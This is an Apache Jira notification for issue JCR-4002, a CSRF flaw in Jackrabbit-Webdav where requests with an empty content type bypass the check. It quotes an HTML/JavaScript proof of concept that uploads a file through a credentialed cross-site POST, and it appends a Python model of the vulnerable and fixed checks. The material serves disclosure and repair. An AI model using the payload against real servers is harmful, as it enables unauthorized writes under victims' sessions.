[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445805#comment-15445805
]
Julian Reschke edited comment on JCR-4002 at 8/29/16 1:12 PM:
--------------------------------------------------------------
As far as I can tell, JcrRemotingServlet would be vulnerable as well; it
extends from AbstractWebdavServlet, but does support POST -- with the change to
the CSRFUtil it leaves the code unprotected when the check is disabled.
The same might be true for other code.
I believe we need to redo this.
was (Author: reschke):
As far as I can tell, JcrRemotingServlet would be vulnerable as well; it
extends from AbstractWebdavServlet, but does support POST.
The same might be true for other code.
> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
> Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
> Reporter: Dominique Jäggi
> Assignee: Dominique Jäggi
> Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments:
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
> <body>
> <script>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
> </script>
> <form action="#">
> <input type="button" value="Submit request" onclick="submitRequest();"
> />
> </form>
> </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
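The check this report describes, as an added model written for this page (not Jackrabbit's own CSRFUtil code): the pre-fix guard only applies the Referer test to POSTs whose Content-Type is on the form-submittable list, so the PoC's typeless Blob, which makes the browser send no Content-Type header at all, is accepted unconditionally, while the fixed guard treats a missing or blank header as form-submittable. The header-dict request shape, the FORM_SUBMITTABLE set and the plain Referer-host-equals-Host comparison are assumptions of this model, not Jackrabbit's configuration.

```python
from urllib.parse import urlsplit

# Constructed model of a content-type based CSRF guard, not Jackrabbit's
# CSRFUtil. A request is modelled as a method string plus a dict of
# lower-cased header names -> values (an absent header is an absent key).

# Media types a plain HTML <form> can POST cross-origin without a CORS
# preflight; a POST carrying one of these must prove it is same-origin.
FORM_SUBMITTABLE = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

def media_type(content_type):
    """Return the bare media type of a Content-Type header value, with
    parameters ('; charset=utf-8') stripped and case folded, or None when
    the header is absent or blank."""
    if content_type is None or not content_type.strip():
        return None
    return content_type.split(";", 1)[0].strip().lower()

def referer_is_same_host(headers):
    """Same-origin test applied when a POST looks like a form submission."""
    referer, host = headers.get("referer"), headers.get("host")
    if not referer or not host:
        return False
    return urlsplit(referer).netloc.lower() == host.lower()

def is_valid_request_vulnerable(method, headers):
    """Pre-fix logic: only a listed content type triggers the Referer
    check, so a POST with no Content-Type at all is accepted blindly."""
    if method.upper() != "POST":
        return True
    if media_type(headers.get("content-type")) in FORM_SUBMITTABLE:
        return referer_is_same_host(headers)
    return True

def is_valid_request_fixed(method, headers):
    """Post-fix logic: a missing or empty Content-Type is treated exactly
    like a form-submittable one and must pass the same Referer check."""
    if method.upper() != "POST":
        return True
    mt = media_type(headers.get("content-type"))
    if mt is None or mt in FORM_SUBMITTABLE:
        return referer_is_same_host(headers)
    return True
```

A POST shaped like the PoC (credentials, no Content-Type, no matching Referer) passes the vulnerable guard and is rejected by the fixed one; a same-host request with `text/plain; charset=UTF-8` still passes both, because the comparison is on the media type rather than the raw header string.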